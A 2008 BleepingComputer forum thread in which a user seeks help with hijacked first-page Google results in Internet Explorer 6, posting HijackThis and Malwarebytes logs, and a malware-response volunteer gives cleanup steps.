Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Google 1st Page Search Results Highlighted


  • This topic is locked This topic is locked
10 replies to this topic

#1 gltech

gltech

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 17 August 2008 - 09:50 PM

Hello,

I've followed the instructions for uploading a HiJackThis log. I've dowloaded and ran all the recommended software (AdAware, SpyBot, etc.). From what I could tell, they didn't seem to find anything significant and I still have the same problem, which is:

I am using IE 6 and my home page is set to "http://www.google.com". Everytime I do a google search, the first page is bogus/hijacked results (stuff like "dealtime.com", "shopping.com"). The page looks just like google, but it's not. But I can click "Next" at the bottom of the page, and I get page 2 of the REAL google results, and I can even then click "Previous" and I get page 1 of the REAL google results. So it only happens for the first "first page" of results for each search.

So here's my HijackThis log. Thanks in advance for the help!


**********************************************************************************************************************8
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:51:29 PM, on 8/17/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\z2 Remote2PC\R2PCSH.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\devldr32.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\z2 Remote2PC\R2PCServ.exe
C:\Program Files\DynDNS Updater\DynDNS.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\GL\Temp\Temp\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [z2 R2PC Server Helper] "C:\Program Files\z2 Remote2PC\R2PCSH.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: AutorunsDisabled
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O15 - Trusted Zone: *.1800flowers.com
O15 - Trusted Zone: *.722.org
O15 - Trusted Zone: *.acura.com
O15 - Trusted Zone: *.adobe.com
O15 - Trusted Zone: *.ajc.com
O15 - Trusted Zone: *.alexnifong.com
O15 - Trusted Zone: *.alldatasheet.com
O15 - Trusted Zone: *.amazon.com
O15 - Trusted Zone: *.americanexpress.com
O15 - Trusted Zone: *.amtrak.com
O15 - Trusted Zone: *.andeanchevy.com
O15 - Trusted Zone: *.anthonydemarialabs.com
O15 - Trusted Zone: *.aphex.com
O15 - Trusted Zone: *.apple.com
O15 - Trusted Zone: *.arieldunes.com
O15 - Trusted Zone: *.asus.com
O15 - Trusted Zone: *.atari.com
O15 - Trusted Zone: *.atlanta-rv-rental.com
O15 - Trusted Zone: *.att.com
O15 - Trusted Zone: *.atwola.com
O15 - Trusted Zone: *.auctionadmin.com
O15 - Trusted Zone: *.audio-technica.com
O15 - Trusted Zone: *.audiomaintenance.com
O15 - Trusted Zone: *.audiomasterclass.com
O15 - Trusted Zone: *.audioupgrades.com
O15 - Trusted Zone: *.autotrader.com
O15 - Trusted Zone: *.bankofamerica.com
O15 - Trusted Zone: *.beachmtrealty.com
O15 - Trusted Zone: *.beechmtnclub.org
O15 - Trusted Zone: *.benttreega.com
O15 - Trusted Zone: *.bgpma.com
O15 - Trusted Zone: *.bigcanoe.com
O15 - Trusted Zone: *.blogspot.com
O15 - Trusted Zone: *.blowingrockresortrentals.com
O15 - Trusted Zone: *.bmw.com
O15 - Trusted Zone: *.bmwusa.com
O15 - Trusted Zone: *.bmwuse.com
O15 - Trusted Zone: *.boortz.com
O15 - Trusted Zone: *.break.com
O15 - Trusted Zone: http://www.brianfreeandassurance.com
O15 - Trusted Zone: *.brianregan.com
O15 - Trusted Zone: *.brightcove.com
O15 - Trusted Zone: *.bubblare.se
O15 - Trusted Zone: *.cadillac.com
O15 - Trusted Zone: *.callawaygolf.com
O15 - Trusted Zone: *.carstereoremoval.com
O15 - Trusted Zone: *.casinoroom.com
O15 - Trusted Zone: *.catalystchurchonline.com
O15 - Trusted Zone: *.channeladvisor.com
O15 - Trusted Zone: *.chase.com
O15 - Trusted Zone: *.checkreorderexpress.com
O15 - Trusted Zone: *.chevrolet.com
O15 - Trusted Zone: *.christianbook.com
O15 - Trusted Zone: *.cinemax.com
O15 - Trusted Zone: *.cingular.com
O15 - Trusted Zone: *.citicards.com
O15 - Trusted Zone: *.clarkeamerican.com
O15 - Trusted Zone: *.clickbank.net
O15 - Trusted Zone: *.cliffscommunities.com
O15 - Trusted Zone: *.cnn.com
O15 - Trusted Zone: *.co.jp
O15 - Trusted Zone: *.cobblynob.net
O15 - Trusted Zone: http://www.cochranfuneralhome.com
O15 - Trusted Zone: *.cochranfuneralhome.com
O15 - Trusted Zone: *.cochranfuneralhomes.com
O15 - Trusted Zone: *.comcast.net
O15 - Trusted Zone: *.componentsource.com
O15 - Trusted Zone: *.compusa.com
O15 - Trusted Zone: *.countryinns.com
O15 - Trusted Zone: *.coursecompass.com
O15 - Trusted Zone: *.daddario.com
O15 - Trusted Zone: *.davidfoster.com
O15 - Trusted Zone: *.decatech.com
O15 - Trusted Zone: *.deere.com
O15 - Trusted Zone: *.dell.com
O15 - Trusted Zone: *.desmoinesregister.com
O15 - Trusted Zone: *.devexpress.com
O15 - Trusted Zone: *.dickssportinggoods.com
O15 - Trusted Zone: *.digidesign.com
O15 - Trusted Zone: *.digikey.com
O15 - Trusted Zone: *.dirxion.com
O15 - Trusted Zone: *.discounttire.com
O15 - Trusted Zone: *.discovercard.com
O15 - Trusted Zone: dsc.discovery.com
O15 - Trusted Zone: http://dsc.discovery.com
O15 - Trusted Zone: *.discovery.com
O15 - Trusted Zone: *.earthlink.net
O15 - Trusted Zone: *.ebay.com
O15 - Trusted Zone: *.edmunds.com
O15 - Trusted Zone: *.emginc.com
O15 - Trusted Zone: *.enterpriseitplanet.com
O15 - Trusted Zone: *.equitech.com
O15 - Trusted Zone: *.executivevisions.com
O15 - Trusted Zone: *.extendedstayhotels.com
O15 - Trusted Zone: *.fancast.com
O15 - Trusted Zone: *.fastmail.fm
O15 - Trusted Zone: *.faxitnice.com
O15 - Trusted Zone: *.fender.com
O15 - Trusted Zone: *.fernandokeops.com
O15 - Trusted Zone: *.fidelity.com
O15 - Trusted Zone: *.file2upload.com
O15 - Trusted Zone: *.flightterrain.com
O15 - Trusted Zone: *.flightview.com
O15 - Trusted Zone: *.ford.com
O15 - Trusted Zone: *.foxfirepropertiesinc.com
O15 - Trusted Zone: *.foxnews.com
O15 - Trusted Zone: *.franksredhot.com
O15 - Trusted Zone: *.freecreditreport.com
O15 - Trusted Zone: *.ftd.com
O15 - Trusted Zone: *.fultonassessor.org
O15 - Trusted Zone: *.fxnetworks.com
O15 - Trusted Zone: *.ga.us
O15 - Trusted Zone: *.games.com
O15 - Trusted Zone: *.glt1.com
O15 - Trusted Zone: *.gltech.com
O15 - Trusted Zone: *.gmc.com
O15 - Trusted Zone: http://www.gmcertified.com
O15 - Trusted Zone: *.gmcertified.com
O15 - Trusted Zone: *.gmpartsdirect.com
O15 - Trusted Zone: *.go-ev.com
O15 - Trusted Zone: *.go.com
O15 - Trusted Zone: *.goindustry.com
O15 - Trusted Zone: *.goldclubatlanta.com
O15 - Trusted Zone: *.golf.com
O15 - Trusted Zone: *.golfblackmountain.com
O15 - Trusted Zone: *.golfexchange.com
O15 - Trusted Zone: *.golfio.com
O15 - Trusted Zone: *.greatquotesmovie.com
O15 - Trusted Zone: *.guitarcenter.com
O15 - Trusted Zone: *.guitarplayertv.com
O15 - Trusted Zone: *.hakkousa.com
O15 - Trusted Zone: *.handlaidtrack.com
O15 - Trusted Zone: *.harmonhomes.com
O15 - Trusted Zone: *.harvard.edu
O15 - Trusted Zone: *.hawksnest-resort.com
O15 - Trusted Zone: *.hbo.com
O15 - Trusted Zone: *.hbotellus.com
O15 - Trusted Zone: *.heavytruckparts.net
O15 - Trusted Zone: *.hertz.com
O15 - Trusted Zone: *.hgtv.com
O15 - Trusted Zone: *.hhs.gov
O15 - Trusted Zone: *.hiltonoceanfrontresort.com
O15 - Trusted Zone: *.history.com
O15 - Trusted Zone: *.homedepot.com
O15 - Trusted Zone: *.honeydolls.jp
O15 - Trusted Zone: *.howstuffworks.com
O15 - Trusted Zone: *.hrblock.com
O15 - Trusted Zone: *.hsbcapply.com
O15 - Trusted Zone: *.huffingtonpost.com
O15 - Trusted Zone: *.hyatt.com
O15 - Trusted Zone: *.ifilm.com
O15 - Trusted Zone: *.imdb.com
O15 - Trusted Zone: *.inmotionhosting.com
O15 - Trusted Zone: *.instantsoftwareonline.com
O15 - Trusted Zone: *.intel.com
O15 - Trusted Zone: *.internet.com
O15 - Trusted Zone: *.interstatebatteries.com
O15 - Trusted Zone: *.ivertigo.net
O15 - Trusted Zone: *.ivideosongs.com
O15 - Trusted Zone: *.jardenstore.com
O15 - Trusted Zone: *.java.com
O15 - Trusted Zone: *.jcvideo.com
O15 - Trusted Zone: *.jeep.com
O15 - Trusted Zone: *.jimmclean.com
O15 - Trusted Zone: *.jimmywooten.com
O15 - Trusted Zone: *.joblo.com
O15 - Trusted Zone: *.joethibodeau.com
O15 - Trusted Zone: *.kaufmanandassociates.net
O15 - Trusted Zone: *.klonteska.com
O15 - Trusted Zone: *.koco.com
O15 - Trusted Zone: *.kohler.com
O15 - Trusted Zone: *.lakelanierislands.com
O15 - Trusted Zone: *.lakewood-baptist.com
O15 - Trusted Zone: *.langley-design.com
O15 - Trusted Zone: *.lexus.com
O15 - Trusted Zone: *.lifetributes.com
O15 - Trusted Zone: *.line6.com
O15 - Trusted Zone: http://www.lingerlongercommunities.com
O15 - Trusted Zone: *.lingerlongercommunities.com
O15 - Trusted Zone: *.lipoinfo.com
O15 - Trusted Zone: *.listerine.com
O15 - Trusted Zone: *.live.com
O15 - Trusted Zone: *.liveleak.com
O15 - Trusted Zone: *.livemeeting.com
O15 - Trusted Zone: *.llpub.com
O15 - Trusted Zone: *.logmein.com
O15 - Trusted Zone: *.lumsys.com
O15 - Trusted Zone: *.m-audio.com
O15 - Trusted Zone: *.mac.com
O15 - Trusted Zone: *.makewords.com
O15 - Trusted Zone: *.mapquest.com
O15 - Trusted Zone: *.mariott.com
O15 - Trusted Zone: *.marketworks.com
O15 - Trusted Zone: *.marktwainhotel.com
O15 - Trusted Zone: *.marriedlifeonline.com
O15 - Trusted Zone: *.marriott.com
O15 - Trusted Zone: *.marshallamps.com
O15 - Trusted Zone: *.masters.org
O15 - Trusted Zone: *.mathxl.com
O15 - Trusted Zone: *.mazda.com
O15 - Trusted Zone: *.mazdausa.com
O15 - Trusted Zone: *.mbusa.com
O15 - Trusted Zone: *.mercuryvehicles.com
O15 - Trusted Zone: *.mercysmark.com
O15 - Trusted Zone: *.metacafe.com
O15 - Trusted Zone: *.michaelgleason.org
O15 - Trusted Zone: *.mickeythomas.com
O15 - Trusted Zone: *.midwesttalent.com
O15 - Trusted Zone: *.model-railroad-hobbyist.com
O15 - Trusted Zone: *.molex.com
O15 - Trusted Zone: *.morningstarstudios.com
O15 - Trusted Zone: *.motorplace.com
O15 - Trusted Zone: *.motu.com
O15 - Trusted Zone: *.mpc-inc.com
O15 - Trusted Zone: *.msn.com
O15 - Trusted Zone: *.musiciansfriend.com
O15 - Trusted Zone: *.mwave.com
O15 - Trusted Zone: *.myheritage.com
O15 - Trusted Zone: *.mylifetime.com
O15 - Trusted Zone: *.myspace.com
O15 - Trusted Zone: *.napavalley.com
O15 - Trusted Zone: *.nashchevy.com
O15 - Trusted Zone: *.native-instruments
O15 - Trusted Zone: *.native-instruments.com
O15 - Trusted Zone: *.nbc.com
O15 - Trusted Zone: *.nero.com
O15 - Trusted Zone: *.netflix.com
O15 - Trusted Zone: *.netgear.com
O15 - Trusted Zone: *.netjets.com
O15 - Trusted Zone: *.newcars.com
O15 - Trusted Zone: *.newhorizons.com
O15 - Trusted Zone: *.newsbuster.org
O15 - Trusted Zone: *.newsbusters.org
O15 - Trusted Zone: *.nick.com
O15 - Trusted Zone: *.nickatnite.com
O15 - Trusted Zone: *.nike.com
O15 - Trusted Zone: *.nikegolf.com
O15 - Trusted Zone: *.nixonpower.com
O15 - Trusted Zone: *.nordstrom.com
O15 - Trusted Zone: *.northernhydraulics.com
O15 - Trusted Zone: *.northpoint.org
O15 - Trusted Zone: *.northpointleaders.org
O15 - Trusted Zone: *.northpointministries.org
O15 - Trusted Zone: *.northpointmusic.org
O15 - Trusted Zone: *.ocmicrosupply.com
O15 - Trusted Zone: *.onesky.com
O15 - Trusted Zone: *.oopsclips.com
O15 - Trusted Zone: *.palmbeachpost.com
O15 - Trusted Zone: *.pandora-software.com
O15 - Trusted Zone: *.parkplacecondos.com
O15 - Trusted Zone: *.partsvoice.com
O15 - Trusted Zone: *.passport.net
O15 - Trusted Zone: *.paul-franklin.com
O15 - Trusted Zone: *.paypal.com
O15 - Trusted Zone: *.pbs.org
O15 - Trusted Zone: *.pensketruckrental.com
O15 - Trusted Zone: *.perfectconnextion.com
O15 - Trusted Zone: *.peteparts.com
O15 - Trusted Zone: *.peterbilt.com
O15 - Trusted Zone: *.petersontuners.com
O15 - Trusted Zone: *.pga.com
O15 - Trusted Zone: *.pgatour.com
O15 - Trusted Zone: *.pickettcustomtrucks.com
O15 - Trusted Zone: *.pinnacleinn.com
O15 - Trusted Zone: *.pinnaclesys.com
O15 - Trusted Zone: *.pioneerfaq.info
O15 - Trusted Zone: *.planningcenteronline.com
O15 - Trusted Zone: *.pluginfeeds.com
O15 - Trusted Zone: *.pokernetwork.co.uk
O15 - Trusted Zone: *.popularmechanics.com
O15 - Trusted Zone: *.priceline.com
O15 - Trusted Zone: *.proguitarshop.com
O15 - Trusted Zone: *.publicrecording.com
O15 - Trusted Zone: *.qpublic.com
O15 - Trusted Zone: *.qpublic.net
O15 - Trusted Zone: *.r2d2translator.com
O15 - Trusted Zone: *.rapidfax.com
O15 - Trusted Zone: *.ravencrestcondos.com
O15 - Trusted Zone: *.realestatebook.com
O15 - Trusted Zone: *.realtor.com
O15 - Trusted Zone: *.reciprocalgolf.com
O15 - Trusted Zone: *.recordproduction.com
O15 - Trusted Zone: *.redtailmountain.com
O15 - Trusted Zone: *.regensburg.de
O15 - Trusted Zone: *.remax-carolina.com
O15 - Trusted Zone: *.remax.com
O15 - Trusted Zone: *.reynoldsplantation.com
O15 - Trusted Zone: *.rhapsody.com
O15 - Trusted Zone: *.rhondaallison.com
O15 - Trusted Zone: *.rippingtons.com
O15 - Trusted Zone: *.rockpointcc.org
O15 - Trusted Zone: *.rocktron.com
O15 - Trusted Zone: *.rockyou.com
O15 - Trusted Zone: *.rodneymills.com
O15 - Trusted Zone: *.roulette4fun.com
O15 - Trusted Zone: *.sameinc.com
O15 - Trusted Zone: *.sat-gps-locate.com
O15 - Trusted Zone: *.satcure-focus.com
O15 - Trusted Zone: *.saturn.com
O15 - Trusted Zone: *.sawstudio.com
O15 - Trusted Zone: *.seagate.com
O15 - Trusted Zone: *.sears.com
O15 - Trusted Zone: *.seascape-resort.com
O15 - Trusted Zone: *.seymourduncan.com
O15 - Trusted Zone: *.sho.com
O15 - Trusted Zone: *.sketchup.com
O15 - Trusted Zone: *.smwa.net
O15 - Trusted Zone: *.soundclick.com
O15 - Trusted Zone: *.soundlabstudio.com
O15 - Trusted Zone: *.soundscalpel.com
O15 - Trusted Zone: *.space.com
O15 - Trusted Zone: *.speedtest.net
O15 - Trusted Zone: *.squaretrade.com
O15 - Trusted Zone: *.statefarm.com
O15 - Trusted Zone: *.statement2web.com
O15 - Trusted Zone: *.steelguitaramericas.com
O15 - Trusted Zone: *.stevefee.com
O15 - Trusted Zone: *.strobostomp.com
O15 - Trusted Zone: *.studioauditions.com
O15 - Trusted Zone: *.studiobeautywarehouse.com
O15 - Trusted Zone: *.studioelectronics.biz
O15 - Trusted Zone: *.studioplus.com
O15 - Trusted Zone: *.sundaysatnorthpoint.org
O15 - Trusted Zone: *.sweetwater.com
O15 - Trusted Zone: *.swreg.org
O15 - Trusted Zone: *.talkofthetownonline.com
O15 - Trusted Zone: *.tax9er.com
O15 - Trusted Zone: *.technologygroupatlanta.com
O15 - Trusted Zone: *.tgw.com
O15 - Trusted Zone: *.thegolfchannel.com
O15 - Trusted Zone: *.theorangeconference.com
O15 - Trusted Zone: *.time.gov
O15 - Trusted Zone: *.tirerack.com
O15 - Trusted Zone: *.titleist.com
O15 - Trusted Zone: *.tobyswartz.com
O15 - Trusted Zone: *.toddfields.com
O15 - Trusted Zone: *.topflite.com
O15 - Trusted Zone: *.toyota.com
O15 - Trusted Zone: *.trains.com
O15 - Trusted Zone: *.travelocity.com
O15 - Trusted Zone: *.triumphtheinsultcomicdog.com
O15 - Trusted Zone: *.truckpaper.com
O15 - Trusted Zone: *.tvland.com
O15 - Trusted Zone: *.ucbweb.com
O15 - Trusted Zone: *.uga.edu
O15 - Trusted Zone: *.ultimategolfsystem.com
O15 - Trusted Zone: *.usatoday.com
O15 - Trusted Zone: *.verizonwireless.com
O15 - Trusted Zone: *.vh1.com
O15 - Trusted Zone: *.vijaysgolfmat.com
O15 - Trusted Zone: *.virb.com
O15 - Trusted Zone: *.visitboonenc.com
O15 - Trusted Zone: *.visualtour.com
O15 - Trusted Zone: *.vrmreservations.com
O15 - Trusted Zone: *.vzwamp.com
O15 - Trusted Zone: *.wdev
O15 - Trusted Zone: *.webkinz.com
O15 - Trusted Zone: *.wendys.com
O15 - Trusted Zone: *.weslachot.com
O15 - Trusted Zone: *.whoradio.com
O15 - Trusted Zone: *.wikipedia.org
O15 - Trusted Zone: *.windstream.com
O15 - Trusted Zone: *.winshape.org
O15 - Trusted Zone: http://www.wolfcreekbroadcasting.com
O15 - Trusted Zone: *.wolfcreekbroadcasting.com
O15 - Trusted Zone: *.wordpress.com
O15 - Trusted Zone: *.wxii12.com
O15 - Trusted Zone: *.xceed.com
O15 - Trusted Zone: *.yale.edu
O15 - Trusted Zone: *.yonahlossee.com
O15 - Trusted Zone: *.youtube.com
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O17 - HKLM\System\CCS\Services\Tcpip\..\{42CDC7C4-F7EB-4E2B-A3B7-4FC4EB06E469}: NameServer = 192.168.254.102
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: DynDNS Updater Service (DynDNS_Updater_Service) - Kana Solution - C:\Program Files\DynDNS Updater\DynDNS.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: z2 Remote2PC Server (z2 R2PC Server) - z2 Software - C:\Program Files\z2 Remote2PC\R2PCServ.exe

--
End of file - 18753 bytes

BC AdBot (Login to Remove)

 


#2 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 17 August 2008 - 10:22 PM

Thought I'd add that I used NetMon to see that, when I reproduce the problem all the traffic not going to google is going to 76.163.191.132.

#3 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 17 August 2008 - 11:47 PM

As in my previous post, I used NetMon to find the ipaddress my system is hitting. I found a web page that said you could do this (from a command prompt):

ROUTE ADD 76.163.191.132 127.0.0.1

to block access to that ip address. I did that and the google search problem is gone. Of course I'm not saying that's the solution, I'm just providing more clues.

Oh, and another comment. I don't see how I got this in the first place, because I have all activex, java applets and anything like that disabled in my Internet Zone. I'm a software developer and have been running IE this way forever. This is the first time I've ever been infected with anything.

#4 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 02:35 AM

Hello gltech,

Welcome to Bleeping Computer :thumbsup:

Let's see if there is an easy solution to this:

Please download WinHelp2002's DelDomains by right-clicking on the following link, and choosing "Save Target As":
http://www.mvps.org/winhelp2002/DelDomains.inf
Save the file to the desktop. Then go to the desktop, right click on DelDomains.inf, and choose Install. You may not see any noticeable changes or prompts; this is normal. Then please restart your computer.

Please download Malwarebytes' Anti-Malware from one of these places:
http://www.majorgeeks.com/Malwarebytes_Ant...ware_d5756.html
http://www.besttechie.net/tools/mbam-setup.exe

Double Click mbam-setup.exe to install the application.

* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select "Perform Quick Scan", then click Scan.
* The scan may take some time to finish,so please be patient.
* When the scan is complete, click OK, then Show Results to view the results.
* Make sure that everything is checked, and click Remove Selected.
* When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)
* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
* Copy&Paste the entire report in your next reply along with a fresh HijackThis log.

Extra Note:
If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process,if asked to restart the computer,please do so immediately.

Thanks,
tea
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Posted Image


Error reading poptart in Drive A: Delete kids y/n?

#5 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 18 August 2008 - 01:53 PM

Hello Tea,

Thanks so much for your help. I have performed the operations you recommended. The Anti-Malware application reported "No malicious items were detected". Immediately below is its log file, followed by a fresh HijackThis log as requested.

************************************************************************
Malwarebytes' Anti-Malware 1.25
Database version: 1066
Windows 5.1.2600 Service Pack 2

2:43:18 PM 8/18/2008
mbam-log-08-18-2008 (14-43-18).txt

Scan type: Quick Scan
Objects scanned: 79660
Time elapsed: 14 minute(s), 23 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


*********************************************************************************************************
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:52:10 PM, on 8/18/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\z2 Remote2PC\R2PCSH.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\devldr32.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\z2 Remote2PC\R2PCServ.exe
C:\Program Files\DynDNS Updater\DynDNS.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\dllhost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\coolpro2\coolpro2.exe
C:\GL\Temp\Temp\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [z2 R2PC Server Helper] "C:\Program Files\z2 Remote2PC\R2PCSH.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: AutorunsDisabled
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (file missing)
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
